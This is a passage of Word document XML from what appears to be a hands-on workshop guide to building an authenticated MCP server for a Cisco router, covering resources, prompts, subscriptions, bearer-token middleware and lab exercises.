      <w:r>
        <w:t xml:space="preserve">Four resources: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://interfaces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://running-config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (latest snapshot), and one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://interfaces/{name}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — where the client fills in the interface name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tools versus resources is a question of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>who decides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Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Controlled by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>the model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>the application / user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>do something</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>read something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configure_interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>router://running-config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Notice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show running-config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> appears here as a resource even though </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dynamic_show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> refuses it as a command. Not a contradiction: the *model* never gets to pull the full config on its own initiative, but a *human* driving the client can deliberately load it as context. Same data, different control point — and the whole endpoint sits behind the bearer token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Client reality check:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LibreChat does not list or read MCP resources at all. Resources are an Inspector lab. What "supports MCP" means varies enormously by client — always check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Prompts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@mcp.prompt(title="Troubleshoot an interface")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def troubleshoot_interface(interface: str)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(f"Troubleshoot {interface} on Router1 step by step: ...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Prompts are reusable, parameterized templates the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> picks from the client's UI — the third control point (model → tools, application → resources, user → prompts). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>troubleshoot_interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> builds a structured diagnostic request; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>audit_router_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs a config review checklist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Naming trap: LibreChat's "Prompts" feature in its UI is its own local prompt library — completely unrelated to MCP prompts, which LibreChat does not consume. Prompts are demonstrated in Inspector's Prompts tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Subscriptions and Notifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>FastMCP has no subscription API, so this section reaches one level down to the wrapped low-level server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mcp._mcp_server</w:t>
      </w:r>
      <w:r>
        <w:t>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@_low_level.subscribe_resource()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_on_subscribe(uri: AnyUrl) -&gt; None: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session = _low_level.request_context.session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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The server remembers who subscribed to what. After any config write, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_notify_config_changed()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> walks the subscriber list and sends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>notifications/resources/updated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://running-config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lab flow: subscribe in Inspector → run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>create_loopback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → watch the update notification arrive without asking for it. That is the push half of MCP — everything else you have seen is request/response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Just below sits a small but honest hack: the SDK's default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> response hardcodes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>resources.subscribe: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and omits the listChanged flags, even when the server implements them. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_create_init_options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wrapper overrides that so the server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>advertises what it actually does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"subscribe": true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Inspector's initialize view — that is this wrapper working.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Authentication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class BearerAuthMiddleware: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async def __call__(self, scope, receive, send):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if scope["type"] == "http" and scope["path"].startswith(self.protected_path):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provided = headers.get("authorization", "")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if not secrets.compare_digest(provided, self.expected):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    # 401 + WWW-Authenticate: Bearer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">MCP does not invent its own authentication — remote servers use plain HTTP auth. Here: a bearer token. Every request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/mcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> must carry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Authorization: Bearer &lt;MCP_AUTH_TOKEN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; anything else gets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a hint telling you exactly which header to send. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stays open so you can health-check a server before you have credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Details worth stealing for real code: the comparison uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secrets.compare_digest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (constant-time — immune to timing attacks), and the middleware is written as raw ASGI rather than the more convenient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BaseHTTPMiddleware</w:t>
      </w:r>
      <w:r>
        <w:t>, because the latter buffers streaming responses and MCP's transport streams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Both clients send the same header: LibreChat from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>headers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>librechat.yaml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (via its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CISCO_MCP_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> env var — must match the server's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MCP_AUTH_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t>), Inspector from the Bearer Token field in its connect pane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Startup and Wiring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app = FastAPI(title="Cisco Router MCP Server", lifespan=lifespan)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@app.get("/")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def root(): ...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app.mount("/", mcp.streamable_http_app())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app.add_middleware(BearerAuthMiddleware, token=MCP_AUTH_TOKEN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Order matters and each line is doing a job:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lifespan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> starts FastMCP's session manager with the app — without it, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/mcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> answers nothing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> route is defined </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the mount, so it wins; every other path falls through to the FastMCP app, which serves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/mcp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The middleware wraps the whole stack last, so the token check runs before anything else sees the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>./run.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bootstraps everything: creates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.venv/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on first run, installs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, loads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, starts uvicorn on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0.0.0.0:8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (override with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HOST</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PORT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>./smoke_test.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then verifies the wire basics — health, 401, initialize, tools/list — in thirteen checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>13. Things to Try</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Each of these is a small, safe modification. Restart the server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>./run.sh</w:t>
      </w:r>
      <w:r>
        <w:t>) after each change and verify in Inspector before trying it from LibreChat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Add a show command to the allowlist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — one line in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ALLOWED_SHOW_COMMANDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show ip arp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Verify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dynamic_show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accepts it. Done when: the new command runs and an off-list command is still rejected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Write a new read-only tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_uptime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>run_show("show version")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and returning just the uptime line. Copy the shape of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_interfaces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: decorator, annotation, docstring, try/except returning error text. Done when: it appears in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>readOnlyHint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and answers in LibreChat chat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Start locked down</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MCP_CONFIG_TOOLS_DEFAULT=disabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, restart, and watch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shrink to five. Re-enable live with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enable_config_tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and catch the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tools/list_changed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> notification in Inspector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Change the token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — set a new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MCP_AUTH_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the server's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and watch LibreChat break with 401s until you update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CISCO_MCP_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the LibreChat side. Now you have debugged the most common real-world MCP integration failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Add a resource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — expose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show ip route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>router://routes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Three lines, copy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>interfaces_resource</w:t>
      </w:r>
      <w:r>
        <w:t>. Done when: it appears in Inspector's Resources tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>14.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GET http://172.18.1.2:8000/ (no auth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MCP endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>http://172.18.1.2:8000/mcp (Streamable HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Auth header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Authorization: Bearer cisco-mcp-workshop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Read-only tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>get_interfaces, get_router_info, dynamic_show, snapshot_config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Destructive tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>configure_interface, create_loopback (toggle: enable_config_tools)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router://interfaces, router://running-config, router://baseline, router://interfaces/{name}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Prompts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>troubleshoot_interface, audit_router_config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Server env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>.env (copy from .env.example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Smoke test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
